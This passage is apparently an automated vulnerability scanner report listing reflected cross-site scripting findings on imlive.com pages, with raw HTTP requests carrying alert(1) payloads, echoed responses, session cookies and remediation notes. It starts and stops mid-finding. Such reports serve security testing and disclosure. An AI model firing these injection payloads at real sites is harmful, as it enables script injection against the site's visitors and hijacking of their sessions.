GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=2d7c5'onerror%3d'alert(1)'1cb395fc54c HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:30 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: igr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDQQRQRCTC=GAOPGJMAIPBIPMLIPIDNAHJF; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:31 GMT
Connection: close
Content-Length: 8306
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=gr.imlive.com&ul=/waccess/2d7c5'onerror='alert(1)'1cb395fc54c/&lr=1107815903&ud=0&pe=404.asp&qs=404;http://gr.imlive.com:80/waccess/2d7c5'onerror='alert(1)'1cb395fc54c/&sr=0&id=0&iu=1' height='1' width='1'>
...[SNIP]...

2.47. http://gr.imlive.com/waccess/ [promocode parameter]

Summary

Severity: High
Confidence: Certain
Host: http://gr.imlive.com
Path: /waccess/

Issue detail

The value of the promocode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e1c5"><script>alert(1)</script>6962831ce28 was submitted in the promocode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA55833e1c5"><script>alert(1)</script>6962831ce28&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; spvdr=vd=0363af80-a596-4403-b86a-074c2d206882&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=jpdip0zu5onkob3b3yj0jba1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:46:26 GMT
Connection: close
Content-Length: 24865


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="el-GR" lang="el-GR" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA55833e1c5"><script>alert(1)</script>6962831ce28&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

2.48. http://imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity: High
Confidence: Certain
Host: http://imlive.com
Path: /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17713'-alert(1)-'0edf03efbd6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?17713'-alert(1)-'0edf03efbd6=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIANFYd9Qok%2fkykcMIgmZjKoQL2Fau65ih2OqtICLHe6Q3eP1TKxG1T%2bPy4j2Jq7jhcGjt6%2fBNVb76RzfvkzfqVaz3rHjvWW%2bqEgtHilu1omsK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:41 GMT
Connection: close
Content-Length: 19663
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/homepage.aspx&he=imlive.com&ul=/?17713'-alert(1)-'0edf03efbd6=1&qs=17713'-alert(1)-'0edf03efbd6=1&qs=17713'-alert(1)-'0edf03efbd6=1&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function
...[SNIP]...

2.49. http://imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99c04"><a>b9169bf5b73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?99c04"><a>b9169bf5b73=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIANFYd9Qok%2fkykcMIgmZjKoQL2Fau65ih2OqtICLHe6Q3eP1TKxG1T%2bPy4j2Jq7jhcGjt6%2fBNVb76RzfvkzfqVaz3rHjvWW%2bqEgtHilu1omsK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:33 GMT
Connection: close
Content-Length: 19502
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/?99c04"><a>b9169bf5b73=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

2.50. http://imlive.com/SiteInformation.html [REST URL parameter 1]

Summary

Severity: High
Confidence: Certain
Host: http://imlive.com
Path: /SiteInformation.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 652a8'onerror%3d'alert(1)'f61ce20483c was submitted in the REST URL parameter 1. This input was echoed as 652a8'onerror='alert(1)'f61ce20483c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /652a8'onerror%3d'alert(1)'f61ce20483c HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:56 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:56 GMT
Connection: close
Content-Length: 8302
Vary: Accept-Encoding


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/652a8'onerror='alert(1)'f61ce20483c/&lr=1107816009&ud=0&pe=404.asp&qs=404;http://imlive.com:80/652a8'onerror='alert(1)'f61ce20483c/&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

2.51. http://imlive.com/awardarena/ [name of an arbitrarily supplied request parameter]

Summary

Severity: High
Confidence: Certain
Host: http://imlive.com
Path: /awardarena/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80d56'-alert(1)-'698666eeaa0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /awardarena/?80d56'-alert(1)-'698666eeaa0=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:57 GMT
Connection: close
Content-Length: 25371
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostawards.aspx&he=imlive.com&ul=/awardarena/?80d56'-alert(1)-'698666eeaa0=1&qs=80d56'-alert(1)-'698666eeaa0=1&qs=80d56'-alert(1)-'698666eeaa0=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function
...[SNIP]...

2.52. http://imlive.com/awardarena/ [name of an arbitrarily supplied request parameter]

Summary

Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /awardarena/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9ece"><a>e6c79bedc05 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /awardarena/?c9ece"><a>e6c79bedc05=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:54 GMT
Connection: close
Content-Length: 25222
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/awardarena/?c9ece"><a>e6c79bedc05=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

2.53. http://imlive.com/become_celeb.asp [REST URL parameter 1]

Summary

Severity: High
Confidence: Certain
Host: http://imlive.com
Path: /become_celeb.asp

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 47df2'onerror%3d'alert(1)'f893addb900 was submitted in the REST URL parameter 1. This input was echoed as 47df2'onerror='alert(1)'f893addb900 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /47df2'onerror%3d'alert(1)'f893addb900 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:12 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2FSf8bs6wRlvXx1sFag%3D%3D; path=/
Set-Cookie: ix=k; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:25:11 GMT
Connection: close
Content-Length: 19702
Vary: Accept-Encoding


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/47df2'onerror='alert(1)'f893addb900/&lr=1107816008&ud=0&pe=404.asp&qs=404;http://imlive.com:80/47df2'onerror='alert(1)'f893addb900/&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

2.54. http://imlive.com/become_host.asp [name of an arbitrarily supplied request parameter]

Summary

Severity: High
Confidence: Certain
Host: http://imlive.com
Path: /become_host.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15c68'-alert(1)-'911a666a53f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /become_host.asp?15c68'-alert(1)-'911a666a53f=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:25:27 GMT
Connection: close
Content-Length: 21781
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/becomehost.aspx&he=imlive.com&ul=/becomehost.aspx?15c68'-alert(1)-'911a666a53f=1&qs=15c68'-alert(1)-'911a666a53f=1&qs=15c68'-alert(1)-'911a666a53f=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function
...[SNIP]...

2.55. http://imlive.com/become_host.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /become_host.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8175d"><a>ad0c10fb84f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /become_host.asp?8175d"><a>ad0c10fb84f=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
